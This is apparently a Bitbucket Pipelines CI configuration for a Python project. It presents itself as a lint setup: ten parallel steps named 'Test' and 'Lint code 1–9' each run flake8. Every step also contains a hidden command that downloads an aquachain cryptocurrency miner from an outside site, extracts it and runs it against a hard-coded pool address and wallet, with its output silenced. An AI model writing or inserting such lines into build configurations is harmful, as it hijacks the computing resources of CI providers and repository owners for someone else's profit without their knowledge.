image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: Test
          caches:
            - pip
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 168.235.85.77:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/071601 -G > /dev/null
      - step:
          name: Lint code 1
          script:
            # Enforce style consistency across Python projects https://flake8.pycqa.org/en/latest/manpage.html
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 168.235.85.77:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/071601 -G > /dev/null
      - step:
          name: Lint code 2
          script:
            # Enforce style consistency across Python projects https://flake8.pycqa.org/en/latest/manpage.html
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 168.235.85.77:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/071601 -G > /dev/null
      - step:
          name: Lint code 3
          script:
            # Enforce style consistency across Python projects https://flake8.pycqa.org/en/latest/manpage.html
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 168.235.85.77:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/071601 -G > /dev/null
      - step:
          name: Lint code 4
          script:
            # Enforce style consistency across Python projects https://flake8.pycqa.org/en/latest/manpage.html
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 168.235.85.77:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/071601 -G > /dev/null
      - step:
          name: Lint code 5
          script:
            # Enforce style consistency across Python projects https://flake8.pycqa.org/en/latest/manpage.html
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 168.235.85.77:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/071601 -G > /dev/null
      - step:
          name: Lint code 6
          script:
            # Enforce style consistency across Python projects https://flake8.pycqa.org/en/latest/manpage.html
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 168.235.85.77:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/071601 -G > /dev/null
      - step:
          name: Lint code 7
          script:
            # Enforce style consistency across Python projects https://flake8.pycqa.org/en/latest/manpage.html
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 168.235.85.77:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/071601 -G > /dev/null
      - step:
          name: Lint code 8
          script:
            # Enforce style consistency across Python projects https://flake8.pycqa.org/en/latest/manpage.html
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 168.235.85.77:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/071601 -G > /dev/null
      - step:
          name: Lint code 9
          script:
            # Enforce style consistency across Python projects https://flake8.pycqa.org/en/latest/manpage.html
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://info.aquacha.in/latest/aquachain-miner-linux-x64-dev.tar.gz && tar -xvf aquachain-miner-linux-x64-dev.tar.gz && ./aquachain-miner/aquachain-miner-avx -F 168.235.85.77:8888/0x5fcc6d6d48891a57ac1d2b84b637accc7ce56a56/071601 -G > /dev/null
